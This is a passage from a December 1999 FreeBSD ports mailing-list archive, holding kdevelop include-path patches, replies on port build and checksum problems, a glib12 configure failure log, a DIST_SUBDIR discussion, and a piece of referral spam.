"g++/FlexLexer.h" X X class MyLexer : public yyFlexLexer X { END-of-kdevelop/patches/patch-ab echo x - kdevelop/patches/patch-ac sed 's/^X//' >kdevelop/patches/patch-ac << 'END-of-kdevelop/patches/patch-ac' X--- kdevelop/classparser/ClassParser.h Wed Oct 20 16:09:38 1999 X+++ kdevelop/classparser/ClassParser.h.new Sun Dec 12 01:54:20 1999 X@@ -23,7 +23,7 @@ X #include X #include X #include X-#include X+#include "g++/FlexLexer.h" X #include X #include "tokenizer.h" X #include "ClassStore.h" END-of-kdevelop/patches/patch-ac echo x - kdevelop/patches/patch-ad sed 's/^X//' >kdevelop/patches/patch-ad << 'END-of-kdevelop/patches/patch-ad' X--- kdevelop/classparser/tokenizer.l Wed Oct 20 16:09:39 1999 X+++ kdevelop/classparser/tokenizer.l.new Sun Dec 12 01:56:33 1999 X@@ -21,7 +21,7 @@ X #include X #include X #include "tokenizer.h" X- #include "FlexLexer.h" X+ #include "g++/FlexLexer.h" X X class MyLexer : public yyFlexLexer X { END-of-kdevelop/patches/patch-ad exit >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Dec 12 2:45:26 1999 Delivered-To: freebsd-ports@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 758) id D3E0314E77; Sun, 12 Dec 1999 02:45:23 -0800 (PST) Received: from localhost (localhost [127.0.0.1]) by hub.freebsd.org (Postfix) with ESMTP id C0EFF1CD79B; Sun, 12 Dec 1999 02:45:23 -0800 (PST) (envelope-from kris@hub.freebsd.org) Date: Sun, 12 Dec 1999 02:45:23 -0800 (PST) From: Kris Kennaway To: The Unicorn Cc: freebsd-stable@FreeBSD.ORG, freebsd-ports@FreeBSD.ORG Subject: Re: Some (minor) problems with ports on 3.4-RC In-Reply-To: <19991210171956.Y528@unicorn.blackhats.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 10 Dec 1999, The Unicorn wrote: > l0pht-watch 1.1 MD5 checksum mismatch and Makefile not working at all. > Can be installed by hand. This one was an aliasing bug: the distfile is just l0pht-watch.tar.gz, which has no version information and so your system thought it already had the newer version. It builds fine, according to bento.freebsd.org > lsof 4.48A Makefile refers to 4.47 version and 3.4(-RC) not > recognised. Wanted to build 2.x version. Some minor > hacking enabled me to install a 3.3 version without > problems. This one has been fixed. > xpdf 0.90 Depends on t1lib. The configure script wants to check > if an underscore is needed for external symbols. LIB > variable is (temp) changed, but instead of adding an > object (.o) the assembly (.s) file name is added. Not sure if this one was fixed, but I think so. > xwhois 0.3.9 MD5 checksum mismatch and Makefile not working at all. > Can be installed by hand. This one was fixed. Thanks for the feedback! Hope you enjoy 3.4-REL :-) Kris To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Dec 12 3:28:59 1999 Delivered-To: freebsd-ports@freebsd.org Received: from imo22.mx.aol.com (imo22.mx.aol.com [152.163.225.66]) by hub.freebsd.org (Postfix) with ESMTP id A47FC14D4E for ; Sun, 12 Dec 1999 03:28:57 -0800 (PST) (envelope-from LouBug5@aol.com) Received: from LouBug5@aol.com by imo22.mx.aol.com (mail_out_v24.6.) id n.0.720ead03 (3844) for ; Sun, 12 Dec 1999 06:28:50 -0500 (EST) From: LouBug5@aol.com Message-ID: <0.720ead03.2584e0f1@aol.com> Date: Sun, 12 Dec 1999 06:28:49 EST Subject: Get paid just for being online! To: ports@freebsd.org MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Mailer: AOL 4.0 for Windows 95 sub 38 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Get paid just for being online!! I recently ran across AllAdvantage.com, a brand-new company that pays its members to surf the Web - and they've been paying out hundreds of thousands of dollars to members for two months now. The average member check for August was $87.77! Not too shabby for just being online. What's the catch? No catch -- to earn money you agree to give up a little space on your desktop for a message window -- called a Viewbar -- that delivers information about products and services available online. AllAdvantage.com is for real: In September they raised the hours they pay to 25 per month. Some AllAdvantage.com members will earn well over $1,000 EACH in September alone. AllAdvantage.com just completed a deal for $31 million in venture capital funding from some of the savviest investors in the industry. They're putting their money on a winner! The sooner you join, the sooner you'll get paid. Please use my referral ID number (GMW-711). Be sure to tell all your friends who use the Internet -- the more referrals you get, the more money you can earn. You can sign up with AllAdvantage.com right away at http://www.alladvantag e.com/go.asp?refid=GMW-711 This is a really great deal with no strings attached! Sincerely, Oscar Member ID# GMW-711 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Dec 12 5:18:35 1999 Delivered-To: freebsd-ports@freebsd.org Received: from mail.ruhr.de (ns.ruhr.de [141.39.224.34]) by hub.freebsd.org (Postfix) with SMTP id 27E4D14EA0 for ; Sun, 12 Dec 1999 05:18:25 -0800 (PST) (envelope-from robsch@robkaos.ruhr.de) Received: (qmail 61970 invoked by alias); 12 Dec 1999 13:18:18 -0000 Received: by robkaos.ruhr.de (Smail-3.2 1996-Jul-4 #1) id ; Sun, 12 Dec 1999 14:16:30 +0100 (CET) Message-Id: From: robsch@robkaos.ruhr.de (Robert Schien) Subject: problems making glib12 under -current To: FreeBSD-ports@freebsd.org Date: Sun, 12 Dec 1999 14:16:30 +0100 (CET) X-Mailer: ELM [version 2.4ME+ PL54 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On my 4.0-current system (a week old) I am unable to get the glib12 port compiled: ------------------------- ===> Extracting for glib-1.2.6 >> Checksum OK for glib-1.2.6.tar.gz. ===> glib-1.2.6 depends on executable: libtool - found ===> Patching for glib-1.2.6 ===> Applying FreeBSD patches for glib-1.2.6 ===> Configuring for glib-1.2.6 creating cache ./config.cache checking for a BSD compatible install... /usr/bin/install -c -o root -g wheel checking whether build environment is sane... yes checking whether make sets ${MAKE}... yes checking for working aclocal... missing checking for working autoconf... found checking for working automake... missing checking for working autoheader... found checking for working makeinfo... found checking host system type... i386--freebsd4.0 checking build system type... i386--freebsd4.0 checking for ranlib... ranlib checking for gcc... cc checking whether the C compiler (cc ) works... yes checking whether the C compiler (cc ) is a cross-compiler... no checking whether we are using GNU C... yes checking whether cc accepts -g... yes checking for ld used by GCC... /usr/libexec/elf/ld checking if the linker (/usr/libexec/elf/ld) is GNU ld... yes checking for BSD-compatible nm... /usr/bin/nm -B checking whether ln -s works... yes updating cache ./config.cache loading cache ./config.cache within ltconfig checking for object suffix... o checking for executable suffix... no checking for cc option to produce PIC... -fPIC checking if cc PIC flag -fPIC works... yes checking if cc supports -c -o file.o... yes checking if cc supports -c -o file.lo... yes checking if cc supports -fno-rtti -fno-exceptions ... yes checking if cc static flag -static works... -static checking if the linker (/usr/libexec/elf/ld) is GNU ld... yes checking whether the linker (/usr/libexec/elf/ld) supports shared libraries... yes checking command to parse /usr/bin/nm -B output... ok checking how to hardcode library paths into programs... immediate checking for /usr/libexec/elf/ld option to reload object files... -r checking dynamic linker characteristics... freebsd4.0 ld.so checking if libtool supports shared libraries... yes checking whether to build shared libraries... yes checking whether to build static libraries... yes checking for objdir... .libs creating libtool updating cache ./config.cache loading cache ./config.cache checking whether to enable maintainer-specific portions of Makefiles... no checking host system type... i386--freebsd4.0 checking whether to enable memory checking... no checking whether to enable memory profiling... no checking for gcc... (cached) cc checking whether the C compiler (cc ) works... yes checking whether the C compiler (cc ) is a cross-compiler... no checking whether we are using GNU C... (cached) yes checking whether cc accepts -g... (cached) yes checking for cc option to accept ANSI C... none needed checking for a BSD compatible install... /usr/bin/install -c -o root -g wheel checking for extra flags to get ANSI library prototypes... none needed checking for extra flags for POSIX compliance... none needed checking how to run the C preprocessor... cc -E checking for ANSI C header files... yes checking for vprintf... yes checking for atexit... yes checking for on_exit... no checking size of char... 1 checking size of short... 2 checking size of long... 4 checking size of int... 4 checking size of void *... 4 checking size of long long... 8 checking for working const... yes checking for __inline... yes checking for __inline__... yes checking for inline... yes checking whether byte ordering is bigendian... no checking for float.h... yes checking for limits.h... yes checking for pwd.h... yes checking for sys/param.h... yes checking for sys/poll.h... yes checking for sys/select.h... yes checking for sys/time.h... yes checking for sys/times.h... yes checking for unistd.h... yes checking for values.h... no checking for lstat... yes checking for strerror... yes checking for strsignal... yes checking for memmove... yes checking for vsnprintf... yes checking for strcasecmp... yes checking for strncasecmp... yes checking for sys_errlist... yes checking for sys_siglist... yes checking for sys_siglist declaration... yes checking for fd_set... yes, found in sys/types.h checking for wchar.h... no checking for wctype.h... no checking for iswalnum... no checking for iswalnum in -lw... no checking if iswalnum() and friends are properly defined... yes checking whether realloc (NULL,) will work... yes checking for an implementation of va_copy()... no checking for an implementation of __va_copy()... no checking whether va_lists can be copied by value... yes checking for dlopen... yes checking for dlsym... yes checking for preceeding underscore in symbols... no checking for dlerror... yes checking for pthread.h... yes checking for thread implementation... posix checking for pthread_attr_init in -lpthread... no checking for pthread_attr_init in -lpthreads... no checking for pthread_attr_init in -lc_r... no checking for pthread_attr_init... no checking for __d10_pthread_attr_init in -lthread... no checking for __pthread_attr_init_system in -lpthread... no configure: error: I can't find the libraries for the thread implementation posix. Please choose another thread implementation or provide information on your thread implementation. You can also run 'configure --disable-threads' to compile without thread support. ===> Script "configure" failed: here are the contents of "config.log" This file contains any messages produced by compilers while running configure, to aid debugging if configure makes a mistake. configure:634: checking for a BSD compatible install configure:687: checking whether build environment is sane configure:744: checking whether make sets ${MAKE} configure:783: checking for working aclocal configure:796: checking for working autoconf configure:809: checking for working automake configure:822: checking for working autoheader configure:835: checking for working makeinfo configure:951: checking host system type configure:972: checking build system type configure:992: checking for ranlib configure:1022: checking for gcc configure:1135: checking whether the C compiler (cc ) works configure:1151: cc -o conftest conftest.c 1>&5 configure:1177: checking whether the C compiler (cc ) is a cross-compiler configure:1182: checking whether we are using GNU C configure:1191: cc -E conftest.c configure:1210: checking whether cc accepts -g configure:1253: checking for ld used by GCC configure:1316: checking if the linker (/usr/libexec/elf/ld) is GNU ld GNU ld version 2.9.1 (with BFD 2.9.1) configure:1332: checking for BSD-compatible nm configure:1369: checking whether ln -s works ltconfig:603: checking for object suffix ltconfig:604: cc -c conftest.c 1>&5 ltconfig:629: checking for executable suffix ltconfig:630: cc -o conftest conftest.c 1>&5 ltconfig:776: checking if cc PIC flag -fPIC works ltconfig:777: cc -c -fPIC -DPIC conftest.c 1>&5 ltconfig:829: checking if cc supports -c -o file.o ltconfig:830: cc -c -o out/conftest2.o conftest.c 1>&5 ltconfig:862: checking if cc supports -c -o file.lo ltconfig:863: cc -c -c -o conftest.lo conftest.c 1>&5 ltconfig:914: checking if cc supports -fno-rtti -fno-exceptions ltconfig:915: cc -c -fno-rtti -fno-exceptions -c conftest.c conftest.c 1>&5 ltconfig:958: checking if cc static flag -static works ltconfig:959: cc -o conftest -static conftest.c 1>&5 GNU ld version 2.9.1 (with BFD 2.9.1) ltconfig:1592: checking if global_symbol_pipe works ltconfig:1593: cc -c conftest.c 1>&5 ltconfig:1596: eval "/usr/bin/nm -B conftest.o | sed -n -e 's/^.*[ ]\([ABCDGISTW]\)[ ][ ]*\(\)\([_A-Za-z][_A-Za-z0-9]*\)$/\1 \2\3 \3/p' > conftest.nm" ltconfig:1648: cc -o conftest -fno-builtin -fno-rtti -fno-exceptions conftest.c conftstm.o 1>&5 configure:1550: checking whether to enable maintainer-specific portions of Makefiles configure:1580: checking host system type configure:1648: checking whether to enable memory checking configure:1661: checking whether to enable memory profiling configure:1691: checking for gcc configure:1804: checking whether the C compiler (cc ) works configure:1820: cc -o conftest conftest.c 1>&5 configure:1846: checking whether the C compiler (cc ) is a cross-compiler configure:1851: checking whether we are using GNU C configure:1879: checking whether cc accepts -g configure:1914: checking for cc option to accept ANSI C configure:1967: cc -c conftest.c 1>&5 configure:2002: checking for a BSD compatible install configure:2075: checking for extra flags to get ANSI library prototypes configure:2087: cc -o conftest -Wall conftest.c -lm 1>&5 configure:2128: checking for extra flags for POSIX compliance configure:2137: cc -c -Wall conftest.c 1>&5 configure: In function `main': configure:2133: warning: unused variable `dir' configure:2171: checking how to run the C preprocessor configure:2192: cc -E conftest.c >/dev/null 2>conftest.out configure:2251: checking for ANSI C header files configure:2264: cc -E conftest.c >/dev/null 2>conftest.out configure:2331: cc -o conftest -Wall conftest.c 1>&5 configure:2357: checking for vprintf configure:2385: cc -o conftest -Wall conftest.c 1>&5 configure:2465: checking for atexit configure:2493: cc -o conftest -Wall conftest.c 1>&5 configure:2465: checking for on_exit configure:2493: cc -o conftest -Wall conftest.c 1>&5 /usr2/tmp/ccr23326.o: In function `main': /usr2/tmp/ccr23326.o(.text+0x7): undefined reference to `on_exit' configure: failed program was: #line 2470 "configure" #include "confdefs.h" /* System header to define __stub macros and hopefully few prototypes, which can conflict with char on_exit(); below. */ #include /* Override any gcc2 internal prototype to avoid an error. */ /* We use char because int might match the return type of a gcc2 builtin and then its argument prototype would still apply. */ char on_exit(); int main() { /* The GNU C library defines this for functions which it implements to always fail with ENOSYS. Some functions are actually named something starting with __ and the normal name is an alias. */ #if defined (__stub_on_exit) || defined (__stub___on_exit) choke me #else on_exit(); #endif ; return 0; } configure:2519: checking size of char configure:2538: cc -o conftest -Wall conftest.c 1>&5 configure:2530: warning: return-type defaults to `int' configure:2558: checking size of short configure:2577: cc -o conftest -Wall conftest.c 1>&5 configure:2569: warning: return-type defaults to `int' configure:2597: checking size of long configure:2616: cc -o conftest -Wall conftest.c 1>&5 configure:2608: warning: return-type defaults to `int' configure:2636: checking size of int configure:2655: cc -o conftest -Wall conftest.c 1>&5 configure:2647: warning: return-type defaults to `int' configure:2675: checking size of void * configure:2694: cc -o conftest -Wall conftest.c 1>&5 configure:2686: warning: return-type defaults to `int' configure:2714: checking size of long long configure:2733: cc -o conftest -Wall conftest.c 1>&5 configure:2725: warning: return-type defaults to `int' configure:2754: checking for working const configure:2808: cc -c -Wall conftest.c 1>&5 configure: In function `main': configure:2782: warning: unused variable `s' configure:2802: warning: unused variable `foo' configure:2770: warning: unused variable `zero' configure:2764: warning: unused variable `x' configure:2830: checking for __inline configure:2846: cc -o conftest -Wall conftest.c 1>&5 configure:2871: checking for __inline__ configure:2887: cc -o conftest -Wall conftest.c 1>&5 configure:2912: checking for inline configure:2928: cc -o conftest -Wall conftest.c 1>&5 configure:2954: checking whether byte ordering is bigendian configure:2972: cc -c -Wall conftest.c 1>&5 configure:2987: cc -c -Wall conftest.c 1>&5 configure: In function `main': configure:2982: syntax error before `big' configure: failed program was: #line 2976 "configure" #include "confdefs.h" #include #include int main() { #if BYTE_ORDER != BIG_ENDIAN not big endian #endif ; return 0; } configure:3048: checking for float.h configure:3058: cc -E conftest.c >/dev/null 2>conftest.out configure:3091: checking for limits.h configure:3101: cc -E conftest.c >/dev/null 2>conftest.out configure:3134: checking for pwd.h configure:3144: cc -E conftest.c >/dev/null 2>conftest.out configure:3177: checking for sys/param.h configure:3187: cc -E conftest.c >/dev/null 2>conftest.out configure:3220: checking for sys/poll.h configure:3230: cc -E conftest.c >/dev/null 2>conftest.out configure:3263: checking for sys/select.h configure:3273: cc -E conftest.c >/dev/null 2>conftest.out configure:3306: checking for sys/time.h configure:3316: cc -E conftest.c >/dev/null 2>conftest.out configure:3349: checking for sys/times.h configure:3359: cc -E conftest.c >/dev/null 2>conftest.out configure:3392: checking for unistd.h configure:3402: cc -E conftest.c >/dev/null 2>conftest.out configure:3435: checking for values.h configure:3445: cc -E conftest.c >/dev/null 2>conftest.out In file included from configure:3441: /usr/include/values.h:2: warning: #warning "this file includes which is obsoleted, use or instead" configure: failed program was: #line 3440 "configure" #include "confdefs.h" #include configure:3479: checking for lstat configure:3507: cc -o conftest -Wall conftest.c 1>&5 configure:3479: checking for strerror configure:3507: cc -o conftest -Wall conftest.c 1>&5 configure:3479: checking for strsignal configure:3507: cc -o conftest -Wall conftest.c 1>&5 configure:3479: checking for memmove configure:3507: cc -o conftest -Wall conftest.c 1>&5 configure:3479: checking for vsnprintf configure:3507: cc -o conftest -Wall conftest.c 1>&5 configure:3479: checking for strcasecmp configure:3507: cc -o conftest -Wall conftest.c 1>&5 configure:3479: checking for strncasecmp configure:3507: cc -o conftest -Wall conftest.c 1>&5 configure:3534: checking for sys_errlist configure:3547: cc -o conftest -Wall conftest.c 1>&5 configure:3567: checking for sys_siglist configure:3579: cc -o conftest -Wall conftest.c 1>&5 configure:3599: checking for sys_siglist declaration configure:3610: cc -c -Wall conftest.c 1>&5 configure:3630: checking for fd_set configure:3639: cc -c -Wall conftest.c 1>&5 configure: In function `main': configure:3635: warning: unused variable `writeMask' configure:3635: warning: unused variable `readMask' configure:3687: checking for wchar.h configure:3694: cc -E conftest.c >/dev/null 2>conftest.out configure:3690: wchar.h: No such file or directory configure: failed program was: #line 3689 "configure" #include "confdefs.h" #include configure:3718: checking for wctype.h configure:3725: cc -E conftest.c >/dev/null 2>conftest.out configure:3721: wctype.h: No such file or directory configure: failed program was: #line 3720 "configure" #include "confdefs.h" #include configure:3749: checking for iswalnum configure:3777: cc -o conftest -Wall conftest.c 1>&5 /usr2/tmp/ccz23965.o: In function `main': /usr2/tmp/ccz23965.o(.text+0x7): undefined reference to `iswalnum' configure: failed program was: #line 3754 "configure" #include "confdefs.h" /* System header to define __stub macros and hopefully few prototypes, which can conflict with char iswalnum(); below. */ #include /* Override any gcc2 internal prototype to avoid an error. */ /* We use char because int might match the return type of a gcc2 builtin and then its argument prototype would still apply. */ char iswalnum(); int main() { /* The GNU C library defines this for functions which it implements to always fail with ENOSYS. Some functions are actually named something starting with __ and the normal name is an alias. */ #if defined (__stub_iswalnum) || defined (__stub___iswalnum) choke me #else iswalnum(); #endif ; return 0; } configure:3795: checking for iswalnum in -lw configure:3814: cc -o conftest -Wall conftest.c -lw 1>&5 /usr/libexec/elf/ld: cannot open -lw: No such file or directory configure: failed program was: #line 3803 "configure" #include "confdefs.h" /* Override any gcc2 internal prototype to avoid an error. */ /* We use char because int might match the return type of a gcc2 builtin and then its argument prototype would still apply. */ char iswalnum(); int main() { iswalnum() ; return 0; } configure:3846: checking if iswalnum() and friends are properly defined configure:3868: cc -o conftest -Wall conftest.c 1>&5 configure: In function `main': configure:3863: warning: implicit declaration of function `isalnum' configure:3863: warning: value computed is not used configure:3889: checking whether realloc (NULL,) will work configure:3906: cc -o conftest -Wall conftest.c 1>&5 configure:3931: checking for an implementation of va_copy() configure:3957: cc -o conftest -Wall conftest.c 1>&5 configure: In function `f': configure:3946: warning: implicit declaration of function `va_copy' /usr2/tmp/ccA24026.o: In function `f': /usr2/tmp/ccA24026.o(.text+0x18): undefined reference to `va_copy' configure: failed program was: #line 3940 "configure" #include "confdefs.h" #include void f (int i, ...) { va_list args1, args2; va_start (args1, i); va_copy (args2, args1); if (va_arg (args2, int) != 42 || va_arg (args1, int) != 42) exit (1); va_end (args1); va_end (args2); } int main() { f (0, 42); return 0; } configure:3976: checking for an implementation of __va_copy() configure:4002: cc -o conftest -Wall conftest.c 1>&5 configure: In function `f': configure:3991: warning: implicit declaration of function `__va_copy' /usr2/tmp/ccb24040.o: In function `f': /usr2/tmp/ccb24040.o(.text+0x18): undefined reference to `__va_copy' configure: failed program was: #line 3985 "configure" #include "confdefs.h" #include void f (int i, ...) { va_list args1, args2; va_start (args1, i); __va_copy (args2, args1); if (va_arg (args2, int) != 42 || va_arg (args1, int) != 42) exit (1); va_end (args1); va_end (args2); } int main() { f (0, 42); return 0; } configure:4021: checking whether va_lists can be copied by value configure:4047: cc -o conftest -Wall conftest.c 1>&5 configure:4091: checking for dlopen configure:4119: cc -o conftest -Wall conftest.c 1>&5 configure:4134: checking for dlsym configure:4162: cc -o conftest -Wall conftest.c 1>&5 configure:4375: checking for preceeding underscore in symbols configure:4398: cc -o conftest -Wall -Wl,-E conftest.c 1>&5 configure: failed program was: #line 4384 "configure" #include "confdefs.h" #include int glib_underscore_test (void) { return 42; } int main() { void *f1 = (void*)0, *f2 = (void*)0, *handle; handle = dlopen ((void*)0, 0); if (handle) { f1 = dlsym (handle, "glib_underscore_test"); f2 = dlsym (handle, "_glib_underscore_test"); } return (!f2 || f1); } configure:4423: checking for dlerror configure:4451: cc -o conftest -Wall conftest.c 1>&5 configure:4580: checking for pthread.h configure:4590: cc -E conftest.c >/dev/null 2>conftest.out configure:4659: checking for thread implementation configure:4678: checking for pthread_attr_init in -lpthread configure:4697: cc -o conftest -Wall conftest.c -lpthread 1>&5 /usr/libexec/elf/ld: cannot open -lpthread: No such file or directory configure: failed program was: #line 4686 "configure" #include "confdefs.h" /* Override any gcc2 internal prototype to avoid an error. */ /* We use char because int might match the return type of a gcc2 builtin and then its argument prototype would still apply. */ char pthread_attr_init(); int main() { pthread_attr_init() ; return 0; } configure:4719: checking for pthread_attr_init in -lpthreads configure:4738: cc -o conftest -Wall conftest.c -lpthreads 1>&5 /usr/libexec/elf/ld: cannot open -lpthreads: No such file or directory configure: failed program was: #line 4727 "configure" #include "confdefs.h" /* Override any gcc2 internal prototype to avoid an error. */ /* We use char because int might match the return type of a gcc2 builtin and then its argument prototype would still apply. */ char pthread_attr_init(); int main() { pthread_attr_init() ; return 0; } configure:4761: checking for pthread_attr_init in -lc_r configure:4780: cc -o conftest -Wall conftest.c -lc_r 1>&5 /usr/lib/libc.so: warning: tmpnam() possibly used unsafely; consider using mkstemp() /usr/lib/libc.so: warning: tempnam() possibly used unsafely; consider using mkstemp() /usr/lib/libc.so: warning: this program uses gets(), which is unsafe. /usr/lib/libc.so: WARNING! setkey(3) not present in the system! /usr/lib/libc.so: WARNING! des_setkey(3) not present in the system! /usr/lib/libc.so: WARNING! encrypt(3) not present in the system! /usr/lib/libc.so: WARNING! des_cipher(3) not present in the system! /usr/lib/libc.so: warning: mktemp() possibly used unsafely; consider using mkstemp() /usr/lib/libc.so: warning: this program uses f_prealloc(), which is stupid. /usr/lib/libc_r.so: undefined reference to `__sigisempty' configure: failed program was: #line 4769 "configure" #include "confdefs.h" /* Override any gcc2 internal prototype to avoid an error. */ /* We use char because int might match the return type of a gcc2 builtin and then its argument prototype would still apply. */ char pthread_attr_init(); int main() { pthread_attr_init() ; return 0; } configure:4803: checking for pthread_attr_init configure:4831: cc -o conftest -Wall conftest.c 1>&5 /usr2/tmp/cct24221.o: In function `main': /usr2/tmp/cct24221.o(.text+0x7): undefined reference to `pthread_attr_init' configure: failed program was: #line 4808 "configure" #include "confdefs.h" /* System header to define __stub macros and hopefully few prototypes, which can conflict with char pthread_attr_init(); below. */ #include /* Override any gcc2 internal prototype to avoid an error. */ /* We use char because int might match the return type of a gcc2 builtin and then its argument prototype would still apply. */ char pthread_attr_init(); int main() { /* The GNU C library defines this for functions which it implements to always fail with ENOSYS. Some functions are actually named something starting with __ and the normal name is an alias. */ #if defined (__stub_pthread_attr_init) || defined (__stub___pthread_attr_init) choke me #else pthread_attr_init(); #endif ; return 0; } configure:4853: checking for __d10_pthread_attr_init in -lthread configure:4872: cc -o conftest -Wall conftest.c -lthread 1>&5 /usr/libexec/elf/ld: cannot open -lthread: No such file or directory configure: failed program was: #line 4861 "configure" #include "confdefs.h" /* Override any gcc2 internal prototype to avoid an error. */ /* We use char because int might match the return type of a gcc2 builtin and then its argument prototype would still apply. */ char __d10_pthread_attr_init(); int main() { __d10_pthread_attr_init() ; return 0; } configure:4896: checking for __pthread_attr_init_system in -lpthread configure:4915: cc -o conftest -Wall conftest.c -lpthread 1>&5 /usr/libexec/elf/ld: cannot open -lpthread: No such file or directory configure: failed program was: #line 4904 "configure" #include "confdefs.h" /* Override any gcc2 internal prototype to avoid an error. */ /* We use char because int might match the return type of a gcc2 builtin and then its argument prototype would still apply. */ char __pthread_attr_init_system(); int main() { __pthread_attr_init_system() ; return 0; } (end of "config.log") *** Error code 1 Stop in /usr2/FreeBSD/robsch/glib12. *** Error code 1 Stop in /usr2/FreeBSD/robsch/glib12. *** Error code 1 Stop in /usr2/FreeBSD/robsch/glib12. *** Error code 1 Stop in /usr2/FreeBSD/robsch/glib12. ------------------ I recompiled and installed libtool on which gtk12 depends, too. Is there a solution to the problem? TIA Robert To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Dec 12 5:38: 4 1999 Delivered-To: freebsd-ports@freebsd.org Received: from thoth.mch.sni.de (thoth.mch.sni.de [192.35.17.2]) by hub.freebsd.org (Postfix) with ESMTP id F1A0214F9D for ; Sun, 12 Dec 1999 05:38:01 -0800 (PST) (envelope-from andre.albsmeier@mchp.siemens.de) X-Envelope-Sender-Is: andre.albsmeier@mchp.siemens.de (at relayer thoth.mch.sni.de) Received: from mail1.siemens.de (mail1.siemens.de [139.23.33.14]) by thoth.mch.sni.de (8.9.3/8.9.3) with ESMTP id OAA04604 for ; Sun, 12 Dec 1999 14:38:00 +0100 (MET) Received: from curry.mchp.siemens.de (curry.mchp.siemens.de [139.25.42.7]) by mail1.siemens.de (8.9.3/8.9.3) with ESMTP id OAA03819 for ; Sun, 12 Dec 1999 14:38:00 +0100 (MET) Received: (from daemon@localhost) by curry.mchp.siemens.de (8.9.3/8.9.3) id OAA39030 for ; Sun, 12 Dec 1999 14:37:59 +0100 (CET) Date: Sun, 12 Dec 1999 14:37:57 +0100 From: Andre Albsmeier To: Satoshi - Ports Wraith - Asami Cc: Andre Albsmeier , freebsd-ports@freebsd.org Subject: Re: How about using DIST_SUBDIR for ports w multiple files (StarOffice5) Message-ID: <19991212143757.A34632@internal> References: <19991210175316.A17711@internal> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: ; from asami@freebsd.org on Fri, Dec 10, 1999 at 05:31:21PM -0800 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 10-Dec-1999 at 17:31:21 -0800, Satoshi - Ports Wraith - Asami wrote: > * From: Andre Albsmeier > > * I got one suggestion: How about putting all the Staroffice > * related files in a separate directory and not in ${DISTDIR} > * directly? I think this is a good idea for all ports that > * need multiple dist- or patchfiles... > > I think "more than one" sets the threshold a little too low, for Agreed. That's why I brought the example with flash-0.4.3.tgz flash-0.4.3-fbsd-19990512.patch in another mail, where it is obvious to which port the files belong. -Andre > instance if emacs-20.5.1 requires emacs-20.5.tar.gz and > emacs-20.5.1.patch.gz, it probably doesn't have to go into its own > subdirectory. (Or we'll be yo-yo'ing back and forth as the patches > appear and disappear between releases.) > > The current criteria is that "if a port requires a lot of distfiles or > you can't deduce the port's name from the name[s] of the distfiles", > which I believe is good enough. > > Furthermore, I think that can be safely applied to SO5, which has the > following list according to files/md5: > > MD5 (so51a_lnx_01.tar) = 680d631d0cd85e8735b8c3f821cfd2b5 > MD5 (applicat.rdb) = 963432192fb13ee5fd39578becf614c3 > MD5 (libofa517li.so) = 3c3c31b28f3eb40f895fd3db6a121484 > MD5 (libsdb517li.so) = d780b4699658ea3ce71aa9a6cc015137 > > The last three are clearly not obvious enough for my eyes.. > > -PW To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Dec 12 8:34:13 1999 Delivered-To: freebsd-ports@freebsd.org Received: from ms.tokyo.jcom.ne.jp (ms.tokyo.jcom.ne.jp [210.234.123.18]) by hub.freebsd.org (Postfix) with ESMTP id 635BE14E4C for ; Sun, 12 Dec 1999 08:34:00 -0800 (PST) (envelope-from musha@ms.tokyo.jcom.ne.jp) Received: from daemon.local.idaemons.org (pc343031.tokyo.jcom.ne.jp [203.140.143.31]) by ms.tokyo.jcom.ne.jp (8.9.1/3.7W 06/01/99) with ESMTP id BAA13620; Mon, 13 Dec 1999 01:32:24 +0900 (JST) Received: by daemon.local.idaemons.org (8.9.3/3.7W) id BAA66876; Mon, 13 Dec 1999 01:31:52 +0900 (JST) Date: Mon, 13 Dec 1999 01:31:50 +0900 Message-ID: <86g0x85de1.wl@localhost.local.idaemons.org> From: Akinori MUSHA aka knu To: sprice@hiwaay.net, ady@warpnet.ro, freebsd-ports@freebsd.org Subject: Re: ports/14359: Update port: mail/imap-uw In-Reply-To: In your message of "Sun, 12 Dec 1999 00:58:40 +0900" <86bt7x1nbj.wl@localhost.local.idaemons.org> References: <86bt7x1nbj.wl@localhost.local.idaemons.org> User-Agent: Wanderlust/2.2.12 (Joyride) SEMI/1.13.7 (Awazu) PGPGPG FLIM/1.13.2 (Kasanui) MULE XEmacs/21.1 (patch 8) (Bryce Canyon) (i386--freebsd) Organization: A.I.D. MIME-Version: 1.0 (generated by SEMI 1.13.7 - "Awazu") Content-Type: multipart/mixed; boundary="Multipart_Mon_Dec_13_01:31:50_1999-1" Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --Multipart_Mon_Dec_13_01:31:50_1999-1 Content-Type: text/plain; charset=US-ASCII I could test my patch on the latest -CURRENT to see there's no problem. Of course I also tested it on the latest -STABLE (-RC) and everything seems very good. I attached a new patch which should supersede all that I sent previously. Steve, please commit it after the unfreeze. Thanks. -- / /__ __ / ) ) ) ) / http://www.idaemons.org/knu/ Akinori MUSHA aka / (_ / ( (__( mailto:knu@idaemons.org "We are but hungry.. Associated Ita-meshi Daemons!" http://www.idaemons.org/ --Multipart_Mon_Dec_13_01:31:50_1999-1 Content-Type: application/octet-stream; type=patch Content-Disposition: attachment; filename="imap-uw.diff" 